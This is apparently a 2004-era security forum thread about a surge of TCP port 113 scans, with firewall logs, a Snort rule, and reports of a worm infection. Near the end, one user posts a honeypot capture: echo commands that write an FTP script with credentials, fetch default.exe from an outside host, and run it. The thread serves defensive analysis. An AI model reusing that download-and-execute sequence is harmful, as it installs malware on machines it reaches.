kpatz
MY HEAD A SPLODE
Premium
join:2003-06-13
Manchester, NH
| Increase in Ident (TCP 113) scans lately?
I've noticed a lot of unsolicited scans on TCP 113 (auth/ident) lately. In the past I rarely saw scans on this port unless I hit certain ftp or IRC sites. Now I'm seeing a bunch of IPs scanning it.
Is there a new exploit or backdoor that uses this port?
Oops, I may have answered my own question: »isc.incidents.org/port_details.php?port=113
Looks like Korgo listens on this port. Anywho, anyone else seeing scans in the past day or so?
--
Robert Tappan Morris, Jr., got six months in jail for crashing 10% of the computers that Bill Gates made $100 million crashing last weekend. |
|
kpatz
MY HEAD A SPLODE
Premium
join:2003-06-13
Manchester, NH
| Bumping... as scans on 113 seem to be high this morning. Here's a quick snapshot of some of the most recent scans:
quote:
Jul 1 08:03:46 linux1 kernel: Packet log: input DENY eth0 PROTO=6 211.210.123.13:2483 xxx.xxx.xxx.xxx:113 L=48 S=0x80 I=20444 F=0x4000 T=110 SYN (#26)
Jul 1 08:03:49 linux1 kernel: Packet log: input DENY eth0 PROTO=6 211.210.123.13:2483 xxx.xxx.xxx.xxx:113 L=48 S=0x80 I=21366 F=0x4000 T=110 SYN (#26)
Jul 1 08:07:17 linux1 kernel: Packet log: input DENY eth0 PROTO=6 221.141.186.79:1845 xxx.xxx.xxx.xxx:113 L=48 S=0x80 I=3872 F=0x4000 T=109 SYN (#26)
Jul 1 08:07:20 linux1 kernel: Packet log: input DENY eth0 PROTO=6 221.141.186.79:1845 xxx.xxx.xxx.xxx:113 L=48 S=0x80 I=5931 F=0x4000 T=109 SYN (#26)
Jul 1 08:07:30 linux1 kernel: Packet log: input DENY eth0 PROTO=6 210.115.43.81:2042 xxx.xxx.xxx.xxx:113 L=48 S=0x80 I=60595 F=0x4000 T=104 SYN (#26)
Jul 1 08:07:33 linux1 kernel: Packet log: input DENY eth0 PROTO=6 210.115.43.81:2042 xxx.xxx.xxx.xxx:113 L=48 S=0x80 I=387 F=0x4000 T=104 SYN (#26)
Jul 1 08:08:56 linux1 kernel: Packet log: input DENY eth0 PROTO=6 218.233.40.177:4849 xxx.xxx.xxx.xxx:113 L=48 S=0x80 I=24831 F=0x4000 T=109 SYN (#26)
Jul 1 08:09:00 linux1 kernel: Packet log: input DENY eth0 PROTO=6 218.233.40.177:4849 xxx.xxx.xxx.xxx:113 L=48 S=0x80 I=25891 F=0x4000 T=109 SYN (#26)
Jul 1 08:14:12 linux1 kernel: Packet log: input DENY eth0 PROTO=6 218.232.115.83:4072 xxx.xxx.xxx.xxx:113 L=48 S=0x80 I=50734 F=0x4000 T=110 SYN (#26)
Jul 1 08:14:15 linux1 kernel: Packet log: input DENY eth0 PROTO=6 218.232.115.83:4072 xxx.xxx.xxx.xxx:113 L=48 S=0x80 I=53558 F=0x4000 T=110 SYN (#26)
Jul 1 08:17:59 linux1 kernel: Packet log: input DENY eth0 PROTO=6 218.232.130.135:1456 xxx.xxx.xxx.xxx:113 L=48 S=0x80 I=60120 F=0x4000 T=110 SYN (#26)
Jul 1 08:18:03 linux1 kernel: Packet log: input DENY eth0 PROTO=6 218.232.130.135:1456 xxx.xxx.xxx.xxx:113 L=48 S=0x80 I=60605 F=0x4000 T=110 SYN (#26)
--
Robert Tappan Morris, Jr., got six months in jail for crashing 10% of the computers that Bill Gates made $100 million crashing last weekend. |
|
Randy Bell
Premium
join:2002-02-24
Santa Clara, CA
| reply to kpatz
Even four screenshots from VisualZone can't capture all my 113 hits during the past ten days. Thanks for heads-up, there do seem a bunch of hits .. 
--
"But now abide faith, hope, love, these three; but the greatest of these is love." (1 Cor. 13:13) |
|
CrookedSmile
join:2003-08-23
2 edits | reply to kpatz
I was just popping in to post a question about this. I haven't had anything on 113 against my system until this morning and now I have gotten over 600 hits in the last few hours. Has anyone caught data from it yet to see what it is?
--corrected. misread my hit counter. & corrected spelling error |
|
kpatz
MY HEAD A SPLODE
Premium
join:2003-06-13
Manchester, NH
| I'm surprised Blake (Link Logger) hasn't chimed in here, he's the honeypot guy 'round these parts.
I could toss a pot up, but the 113 scans seem to have stopped, at least for now. If they start in again I'll see if I can capture something.
--
Robert Tappan Morris, Jr., got six months in jail for crashing 10% of the computers that Bill Gates made $100 million crashing last weekend. |
|
CrookedSmile
join:2003-08-23
| reply to kpatz
I'm still picking up on a couple of hits a minute. Is this right for making snort capture this port traffic?
alert tcp $EXTERNAL_NET any -> $HOME_NET 113 (msg:"funky 113"; classtype:bad-unknown;)
|
|
kpatz
MY HEAD A SPLODE
Premium
join:2003-06-13
Manchester, NH | I'm the wrong guy to ask, I've never used Snort. I have a home brew TCP honeypot I run on my linux box. |
|
SyStEmF
join:2004-05-19
Bloomfield Hills, MI | reply to kpatz
»isc.incidents.org/port_details.php?port=113 |
|
CrookedSmile
join:2003-08-23 | reply to kpatz
Nevermind. It's already passed on my ip and the new snort rule didn't have anything to capture after it was reloaded. Consequence of a slow machine. I wonder which type of router it is with the ident flaw that is the target of this flooding. |
|
kpatz
MY HEAD A SPLODE
Premium
join:2003-06-13
Manchester, NH | I just checked my FW log and saw some 113 scans so I opened the port and put up a listener. I'll post back if it captures something. |
|
catseyenu
Ack Pfft
Premium
join:2001-11-17
Fix East
| reply to SyStEmF
»isc.incidents.org/port_details.php?port=113 |
|
CrookedSmile
join:2003-08-23
| reply to kpatz
It seems everyone has a copy of the same link to the san's site to answer the thread. Since I doubt that ya'll are posting it for Randy Bell's benefit and that I'm the only other person posting without it in one of my posts, I have to assume it's for my benefit somehow. Thanks. I caught it first time around from kpat's first post. It's very similar to dshield's information on that port. By the way, that's a killer animated avatar catseyenu. This all aside, I pruned this out from SAN's handlers' diary for July 1. Would've provided the link but it doesn't seem necessary since there are already enough to their server here to give a good jump point.
UTH/IDENT Probes
The sensor also picked up quite a few probes to TCP/113 the auth/ident service port. There is a rise in scanning sources reported on Dshield, and a few reports have come in to the handler's list. I was able to capture the traffic and it was in the form of (1026 , 25.) Where the first number was a 4-digit number while the 25 was fixed. A quick read of RFC1413 indicates that these are ident requests from a server in response to a connection from my sensor's IP (source port being the 4-digit number) to their port 25 (SMTP.) Since my sensor didn't send out any connections, it appears that these SMTP connections are spoofed.
Guess I was guessing wrong in my guess earlier. Not the first or the last time for that to happen. |
|
kpatz
MY HEAD A SPLODE
Premium
join:2003-06-13
Manchester, NH
| reply to kpatz
Update: I've had a couple hits on 113 but the listener hasn't logged anything--not even a zero byte file. This means they're likely half-connection attempts (SYN only, no or negative response to ACK).
--
Robert Tappan Morris, Jr., got six months in jail for crashing 10% of the computers that Bill Gates made $100 million crashing last weekend. |
|
CrookedSmile
join:2003-08-23
| reply to kpatz
Nothing here either. I picked up four lonely hits about 3 hours ago but they were all SYN packets from 212.42.38.194 with a high source port number. Snort wasn't too much help but it did give me this information:
LEN=60 TOS=0x00 PREC=0x00 TTL=48 ID=31225 DF PROTO=TCP SPT=52954 DPT=113 WINDOW=65535 RES=0x00 SYN URGP=0
LEN=60 TOS=0x00 PREC=0x00 TTL=48 ID=32819 DF PROTO=TCP SPT=52954 DPT=113 WINDOW=65535 RES=0x00 SYN URGP=0
LEN=60 TOS=0x00 PREC=0x00 TTL=48 ID=34933 DF PROTO=TCP SPT=52954 DPT=113 WINDOW=65535 RES=0x00 SYN URGP=0
LEN=44 TOS=0x00 PREC=0x00 TTL=48 ID=38124 DF PROTO=TCP SPT=52954 DPT=113 WINDOW=65535 RES=0x00 SYN URGP=0
This was probably just a scan of the web for open 113 ports but this is all that has come in since the earlier deluge of hits. Not much at all to go on. I'm willing to let it rest. Especially for the weekend. Thanks for your time and work kpatz! |
|
Camping
@139.142.x.x
| reply to kpatz
Sorry guys but I'm out of action as I'm on holidays for a couple of weeks, so I'm limited to a cell phone connection to get and reply to email. Honey pots are out of the question on this camp. My office is still logging stuff so I can see what happened while I was away 
Blake |
|
kpatz
MY HEAD A SPLODE
Premium
join:2003-06-13
Manchester, NH
| I ran a 113 pot for a few days, but it only captured 0-byte files. And for some reason my capture program kept core dumping everytime something connected to it. I'll have to figger that out. 
Maybe I'll add a feature to have it send something upon connect; right now it only sends after it receives data.
Blake, enjoy your camping trip!
--
Robert Tappan Morris, Jr., got six months in jail for crashing 10% of the computers that Bill Gates made $100 million crashing last weekend. |
|
Fred42
@82.133.x.x
| reply to kpatz
IDENT scans are sent by some misconfigured SMTP servers. Before they let you deliver a message, they try to verify your identity first. This means they won't accept your mail until their IDENT query has times out. For faster mail delivery, it can be worth sending a TCP RST to these servers (i.e. give them a CLOSED response, not a FILTERED response).
I think some IRC servers also send IDENT scans, but again they're not needed, so sending a TCP RST might help there too.
Of course, the real solutiom would be for people to fix their misconfigured SMTP and IRC servers to stop sending these scans. |
|
Name Game
Premium
join:2002-07-07
North Myrtle Beach, SC
| reply to kpatz
Posted by vordak13 at GSF
Hi all i work at the University of South Florida and our College of medicine (and apparently the whole campus) has been hit with some new infection.
When someone gets infected, their computer opens up port 113 and attempts to connect outside our network. This is stopped at the firewall, but it is causing much grief. All the computers so far have been found with a file named soundblaster.exe. The one I worked on had it in C:/Windows/prefetch. The exact filename on the one I worked on was something to the effect of soundblaster.exe.(numbers).pf). I know this this was a bogus file because most of these computers have on-board audio cards, NOT Sound Blaster.
When we delete soundblaster.exe and all the references to it in the registry, Port 113 closes and all is quiet, but reinfections are starting and we have no idea where this is coming from. I have done extensive searches on the web and have heard nothing about this type, though it has some attributes of Korgo. It does not appear to be email propagated as most of the people who are getting this virus have little in common with the others infected.
Any assistance will be greatly appreciated.
»forum.gladiator-antivirus.com/in···54&st=0&
--
Gladiator Security Forum »www.gladiator-antivirus.com/ Missing Kidshttp://www.missingkids.com/ |
|
kpatz
MY HEAD A SPLODE
Premium
join:2003-06-13
Manchester, NH
| Although I haven't seen any unsolicited scans on 113 in a while (they were mostly taking place in July), I checked my logs from when I had a honeypot running on the port, and found one thing that was captured on 7/10:
quote:
echo open ftp.p2.webhosting.yahoo.com 21 >> xXx1.txt
echo uploadme2004 >> xXx1.txt
echo saud159159 >> xXx1.txt
echo binary >> xXx1.txt
echo hash >> xXx1.txt
echo get default.exe >> xXx1.txt
echo quit >> xXx1.txt
ftp -s:xXx1.txt
default.exe
dd
dd
dd
This would imply that "something" opens a remote shell on 113 and someone was attempting to exploit this remote shell, to download some sort of malware from an ftp site and run it. Or a stupid script kiddie assumed that an open port 113 hosted a shell.
Most of the 113 connects my honeypot captured resulted in 0 byte captures, or SYN-only scans.
--
Robert Tappan Morris, Jr., got six months in jail for crashing 10% of the computers that Bill Gates made $100 million crashing last weekend. |
|
